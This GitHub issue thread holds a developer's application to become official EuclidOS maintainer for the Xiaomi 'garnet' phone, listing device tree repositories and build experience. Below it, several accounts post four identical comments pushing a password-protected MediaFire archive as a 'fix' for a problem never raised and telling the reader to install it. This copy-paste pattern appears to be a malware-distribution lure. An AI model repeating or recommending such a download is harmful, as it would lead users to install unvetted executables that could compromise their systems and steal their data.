### ISSUE TITLE
New maintainer

### ISSUE THREAD

**Issue by sppidy** [euclid-Devices/official_devices#2]
## Name and Codename of the device you want to apply for
```
Redmi Note 13 Pro 5G / Poco X6 5G(garnet)
```

## Device Tree sources

```
https://github.com/sppidy/device_xiaomi_garnet/tree/euclid
https://github.com/sppidy/device_xiaomi_garnet-prebuilt
https://github.com/sppidy/vendor_xiaomi_garnet
```

## What ROM's do you maintain officially/unofficially
```
I am maintaining leafOS unofficially
```

## How long have you been building Custom ROMs
```
4 months
```

## Do you build locally or rely on server if server what cloud service provider do you use ?
```
I am build in local
```
## Free trial user or paid user?
```
Not Applicable as I build local
```

### Telegram username
```
sppidy
```

### GitHub username
```
sppidy
```

### [MUST] Link to your XDA thread of unofficial build

```

```

### [MUST] Link to your unofficial EuclidOS Build Post other than XDA

```
https://t.me/garnet_updates/420
```

Some more things to be noted regarding garnet :
```
Garnet doesn't have a proper kernel source, So i am using prebuilt kernel. 
```

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
